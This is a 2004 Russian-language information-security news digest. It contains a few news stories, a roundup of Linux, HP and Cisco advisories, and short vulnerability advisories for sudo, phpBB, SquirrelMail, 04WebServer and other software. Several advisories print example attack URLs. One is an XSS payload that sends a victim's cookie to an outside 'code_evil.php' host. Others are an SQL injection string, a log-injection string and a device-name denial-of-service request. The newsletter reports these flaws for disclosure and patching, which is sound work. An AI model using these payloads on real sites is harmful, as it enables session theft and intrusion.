Отправляет email-рассылки с помощью сервиса Sendsay
  Все выпуски  

15 новостей по информационной безопасности каждый день


Информационный Канал Subscribe.Ru

Новости информационной безопасности Стратег.Ру
Ekey.ru Удостоверяющий Центр"

15.11.2004 - 15.11.2004

Содержание


Регулирование: Законы, постановления, сертификация, контроль

Аргентина: с января 2005 начнется биометрический контроль въезжающих из-за рубежа

15 ноября | www.OXPAHA.ru

С 2005 года в Аргентине будет введено обязательное фотографирование и дактилоскопический контроль лиц, въезжающих из-за рубежа. "С января 2005 года на основных контрольно-пропускных пунктах страны у всех лиц, въезжающих из-за рубежа, будут брать отпечатки пальцев и фотографическое изображение", - сообщил журналистам руководитель миграционной службы Аргентины Риккардо Родригес.

По его словам, эта мера связана с ужесточением контроля за нелегальной миграцией. . "Мы обязаны усилить меры безопасности и контроля, чтобы ограничить нелегальную миграцию в страну. В настоящее время в Аргентине проживает более одного миллиона нелегалов", - сказал Риккардо Родригес. Глава миграционной службы отметил, что в последующем в масштабе всей страны планируется создать систему биометрической идентификации личности.


Проблемные ситуации, информационная преступность, сетевые войны

Составлен список самых сверхъестественных компьютерных неудач

15 ноября | @ASTERA

Британские эксперты по восстановлению потерянных данных из компании Kroll Ontrack составили список самых сверхъестественных "компьютерных неудач". По их мнению, в большинстве случаев виноваты не сбои, не вирусы, а сами пользователи.

Возглавил список человек, поместивший "полетевший" жесткий диск в морозильник — он прочитал в Интернете, что заморозка устранит сбои "железа"и поможет восстановить данные.

Другой пользователь разбирался с папками и случайно удалил те, которые как раз и хотел сохранить. Свою ошибку он понял только после очистки корзины и дефрагментации жесткого диска.

Во время строительства офисного здания стальная балка упала на ноутбук, в котором содержались все планы здания. Выяснилось, что о резервных копиях документов никто не позаботился.

Садясь в машину, женщина положила свой портативный компьютер на крышу автомобиля, забыла об этом и поехала по своим делам. Во время движения ноутбук соскользнул с крыши и разбился.

"Данные могут исчезнуть в результате стихийного бедствия, ошибки системы или компьютерного вируса, но человеческий фактор, включая "компьютерный гнев", кажется растущей проблемой", — сообщил представитель Kroll Ontrack Эдриан Палмер (Adrian Palmer).

Он рассказал историю о человеке, который настолько обезумел от работающего со сбоями компьютера, что бросил его в унитаз и пару раз спустил воду.


Информационные ресурсы

Обзор уведомлений дистрибьюторов операционных систем (с 8 по 14 ноября 2004 года).

15 ноября | SecurityLab.ru

SecurityLab.ru представляет еженедельный обзор уведомлений дистрибьюторов операционных систем. На этой неделе было опубликовано 36 уведомлений от 5 производителей Linux систем, 1 уведомление от Hewlett-Packard и 2 уведомления от Cisco.

GENTOO LINUX опубликовал 12 уведомлений, устраняющих межсайтовое выполнение сценариев в Gallery, множественные переполнения буфера в zgv, переполнение буфера в Kaffeine, gxine, небезопасное создание временных файлов в Portage, Gentoolkit, небезопасное создание временных файлов в OpenSSL, Groff, выполнение произвольного кода в Zip, небезопасное создание временных файлов в mtink, уязвимость форматной строки в ez-ipupdate, множественные переполнения буфера в Pavuk, DoS-атаку в Apache, отказ в обслуживании в Samba и небезопасное создание временных файлов в Davfs2, lvm-user.

Debian опубликовал 7 уведомлений, устраняющих уязвимость в CGI модуле в ruby, переполнение буфера в freeamp, небезопасное создание временных файлов в gzip, уязвимость форматной строки в gnats, целочисленное переполнение в libgd2 и в libgd и уязвимость форматной строки в ez-ipupdate пакетах.

Red Hat опубликовал 10 уведомлений, устраняющих переполнение буфера в zip в Fedora Core 2 и в Fedora Core 3, уязвимость в jwhois в Fedora Core3, отказ в обслуживании в Ruby в Fedora Core 2 и в Fedora Core 3, несколько переполнений буфера в gd в Fedora Core 2 и в Fedora Core 3, выполнение произвольного кода в unarj в Fedora Core 2, множественные уязвимости в glibc в Fedora Core 2 и уязвимость в httpd.

Conectiva Linux опубликовал 3 уведомления, устраняющие целочисленные переполнения в xpdf, множественные уязвимости в libtiff3 и переполнение буфера в sasl2.

Mandrake опубликовал 4 уведомления, устраняющие удаленный отказ в обслуживании в Ruby, уязвимость форматной строки в ez-ipupdate, уязвимость форматной строки в speedtouch и удаленный отказ в обслуживании в Samba.

Hewlett-Packard опубликовал 1 уведомление, устраняющее переполнение буфера в Motif library и Image Viewer.

Cisco опубликовал 2 уведомления, устраняющие DoS-атаку в Cisco IOS и Timing-атаку в Cisco Security Agent.


Дыры и патчи программ и операционных сред

Выполнение произвольных команд в sudo

15 ноября | SecurityLab.ru

Программа: sudo версии до 1.6.8p2

Опасность: Низкая

Наличие эксплоита: Нет

Описание:
Обнаружена уязвимость в sudo. Локальный атакующий может выполнить произвольные команды на уязвимой системе.

Уязвимость существует из-за некорректной обработки переменных окружения и может быть реализована, если на уязвимой системе установлен bash shell и локальный атакующий имеет право выполнять bash сценарии.

URL производителя: http://www.sudo.ws

Решение: Установите обновление
http://www.sudo.ws/sudo/

Межсайтовое выполнение сценариев в Aztek Forum

15 ноября | SecurityLab.ru

Программа: Aztek Forum

Опасность: Низкая

Наличие эксплоита: Да

Описание:
Межсайтовое выполнение сценариев обнаружено в Aztek Forum. Удаленный атакующий может получить важные данные пользователей.

Уязвимость существует в нескольких сценариях при обработке входных данных. Удаленный атакующий может создать специально сформированный URL и выполнить произвольный HTML код в браузере жертвы. Пример:

http://[target]/forum%20aztek/forum_2.php?msg=10
& return=')%3C/script%3E%3Cscript%3E%20% 20document.location=%20'www.site.com/code_evil.php?
cookie='%20+window.document.cookie;%20%20%3C/script%3E

Уязвимость существует при обработке переменных 'return' и 'title' сценария 'forum_2.php', при обработке поисковых запросов в файле 'search.php', а также в переменной 'email' файла 'subscribe.php'

URL производителя: www.forum-aztek.com

Решение: Решение не существует на данный момент.

DoS-атака в Secure Network Messenger

15 ноября | SecurityLab.ru

Программа: Secure Network Messenger 1.4.2 и более ранние версии

Опасность: Высокая

Наличие эксплоита: Да

Описание:
Уязвимость обнаружена в Secure Network Messenger. Удаленный атакующий может аварийно завершить приложение.

Удаленный атакующий может подключиться удаленно к приложению на порт 6144 и отослать 10 или более символов возврата каретки, затем разорвать соединение, подключиться вновь и отослать символ возврата каретки. Эти действия приведут к отказу в обслуживании приложения.

URL производителя: www.networkmessengers.com/msg

Решение: Решение не существует на данный момент.

Повышение привилегий в StarForce

15 ноября | SecurityLab.ru

Программа: StarForce Professional 3.0

Опасность: Низкая

Наличие эксплоита: Нет

Описание:
Уязвимость обнаружена в StarForce. Локальный атакующий может повысить свои привилегии на системе.

Уязвимость существует из-за некорректной обработки событий драйверов.

URL производителя: www.star-force.com/index.phtml?category=56&type=5

Решение: Решение не существует на данный момент.

Выполнение произвольного кода в unarj

15 ноября | SecurityLab.ru

Программа: unarj 2.63a

Опасность: Средняя

Наличие эксплоита: Нет

Описание:
Обнаружено переполнение буфера в unarj. Удаленный атакующий может выполнить произвольный код на уязвимой системе.

Уязвимость существует при обработке длинных имен файлов. Удаленный атакующий может вызвать отказ в обслуживании приложения или выполнить произвольный код на системе с правами текущего пользователя.

Решение: Решение на данный момент не существует.

SQL-инъекция и php инклудинг в phpBB

15 ноября | SecurityLab.ru

Программа: phpBB 2.0.x-2.0.10

Опасность: Высокая

Наличие эксплоита: Да

Описание:
Обнаружено несколько уязвимостей в phpBB. Удаленный атакующий может выполнить произвольный SQL команды и php код на уязвимой системе.

Уязвимость существует при обработке спецсимволов в строке URL. Удаленный атакующий может выполнить SQL-инъекцию и произвольный php-сценарий на уязвимой системе. Пример:

viewtopic.php?t=1&highlight=%2527

URL производителя: www.phpbb.com

Решение: Решение на данный момент не существует.

Timing-атака в Cisco Security Agent

15 ноября | SecurityLab.ru

Программа: Cisco Security Agent versions up to and excluding 4.0.3 build 728, Cisco Security Agent 3.x versions, Okena Stormwatch 3.x versions

Опасность: Средняя

Наличие эксплоита: Да

Описание:
Обнаружена уязвимость в Cisco Security Agent. Удаленный атакующий может обойти ограничения CSA и произвести DoS атаку на уязвимую службу.

Уязвимость обнаружена в модуле, который отвечает за обнаружение атаки на переполнение буфера. При обнаружении атаки такого типа пользователю отсылается предупреждение с возможностью выбора действия для текущего подключения с внутренним таймером на 5 минут. Если пользователь не предпринимает никаких действий по прошествии 5 минут, CSA блокирует соединение.

Удаленный атакующий может предпринять две или более атаки, которые не будут блокированы до тех пор, пока пользователь не сделает свой выбор, или не истечет период ожидания. Удаленный атакующий может за это время предпринять несколько атак на уязвимые службы и выполнить произвольный код на уязвимых системах.

URL производителя: www.cisco.com

Решение: Установите обновление от производителя.

Обход ограничений в Hotfoon dialer

15 ноября | SecurityLab.ru

Программа: Hotfoon dialer 4.0

Опасность: Низкая

Наличие эксплоита: Да

Описание:
Обнаружена уязвимость в Hotfoon dialer. Удаленный атакующий может загрузить произвольные страницы на компьютер целевого пользователя.

Уязвимость существует в модуле chat. Удаленный атакующий может послать целевому пользователю произвольный URL, который будет открыт в его браузере.

URL производителя: www.hotfoon.com

Решение: Решение на данный момент не существует.

Раскрытие информации в OpenSkat

15 ноября | SecurityLab.ru

Программа: OpenSkat версии до 2.1

Опасность: Низкая

Наличие эксплоита: Нет

Описание:
Обнаружена уязвимость в реализации VTMF в OpenSkat. Система создает слабые приватные ключи.

Уязвимость существует в функции CheckGroup() в реализации VTMF. Удаленный пользователь может получить закрытый ключ.

URL производителя: www.freshmeat.net/openSkat

Решение: Установите обновление
http://gaos.org/~stamer/openSkat-2.1.tar.gz

Обход ограничений в HP PSC 2510 Photosmart

15 ноября | SecurityLab.ru

Программа: HP PSC 2510; firmware B.25.31 - RL6206xNS

Опасность: Низкая

Наличие эксплоита: Да

Описание:
Уязвимость обнаружена в принтере HP PSC 2510 Photosmart. Удаленный атакующий может выполнить печать документов.

Уязвимость существует из-за наличия FTP сервера на устройствах PSC 2510. Любой удаленный пользователь может загрузить файл на принтер, который будет распечатан. FTP сервер не может быть административно запрещен.

URL производителя: www.soft3304.net/04WebServer

Решение: Решение на данный момент не существует.

Множественные уязвимости в 04WebServer

15 ноября | SecurityLab.ru

Программа: 04WebServer 1.4.2

Опасность: Средняя

Наличие эксплоита: Да

Описание:
Обнаружено несколько уязвимостей в 04WebServer. Удаленный атакующий может внедрить произвольные символы в лог файл, выполнить XSS атаку и вызвать отказ в обслуживании.

1. Уязвимость существует из-за некорректной обработки HTML кода при отображении результата запроса к несуществующей страницы (ошибка 404). Удаленный атакующий может с помощью специально сформированного URL выполнить произвольный HTML код в браузере жертвы. Пример:

http://[target]/<script>alert('XSS');</script>

2. Удаленный атакующий может внедрить произвольный символы в лог файл. Эта уязвимость может быть использована для инсценировки атаки. Пример:

http://[target]/a%0a[22;45;24]%20< 192.168.1.3>%20(74,632)%20
[%90%b3%8f%ed%82%c9%8f%49%97%b9%82
%b5%82%dc%82%b5%82%bd]%20GET%20/hack

3. Удаленный атакующий может обратиться к MS-DOS устройству, что приведет к отказу в обслуживании при попытке перезапустить службу. Пример:

http://[target]/COM2

URL производителя: www.soft3304.net/04WebServer

Решение: Установите обновление от производителя.

Межсайтовое выполнение сценариев в SquirrelMail

15 ноября | SecurityLab.ru

Программа: SquirrelMail 1.4.3a и более ранние; SquirrelMail 1.5.1-cvs до 23. октября 2004

Опасность: Низкая

Наличие эксплоита: Нет

Описание:
Межсайтовое выполнение сценариев обнаружено в SquirrelMail. Удаленны атакующий может получить доступ к важным данным пользователей.

Уязвимость существует из-за некорректной фильтрации входных данный в функции "decodeHeader()" файла 'mime.php'. Удаленный атакующий может выполнить произвольный HTML код в браузере жертвы в контексте безопасности уязвимого сайта.

URL производителя: www.squirrelmail.org

Решение: Установите обновление от производителя
http://prdownloads.sourceforge.net/squirrelmail/sm143a-xss.diff?download

В Microsoft Windows XP SP2 найдены десять опасных дыр

15 ноября | @ASTERA

Американская компания Finjan Software (Сан-Хосе, штат Калифорния), специализирующаяся на вопросах компьютерной безопасности, предупреждает о наличии десяти опасных уязвимостей в операционной системе Microsoft Windows ХР со вторым пакетом обновлений (SP2).

Дыры теоретически могут использоваться злоумышленниками с целью получения несанкционированного доступа к удаленным компьютерам. Причем для реализации нападения злоумышленнику необходимо просто заманить жертву на сформированную особым образом веб-страницу. Кроме того, брешь присутствует в механизме вывода уведомлений о загружаемых из интернета исполняемых файлах. Используя эту дыру, хакеры могут загрузить на целевую машину произвольный вредоносный код. Более детальная информация относительно выявленных ошибок из соображений безопасности не разглашается.

Корпорация Microsoft уже поставлена в известность о наличии уязвимостей в Windows XP SP2, более того, компания Finjan Software даже продемонстрировала софтверному гиганту соответствующий эксплойт. Тем не менее, в Microsoft считают, что серьезность найденных экспертами Finjan Software дыр преувеличена. Впрочем, как сообщает eWeek.com со ссылкой на заявления представителей софтверного гиганта, корпорация продолжает анализ полученной от вышеназванной фирмы информации и оценивает необходимость выпуска патчей.




Инструменты управления содержанием Метод.ру
Дата создания документа: 19:38 15.11.04

http://subscribe.ru/
http://subscribe.ru/feedback/
Подписан адрес:
Код этой рассылки: inet.safety.cybersecurity
Отписаться

В избранное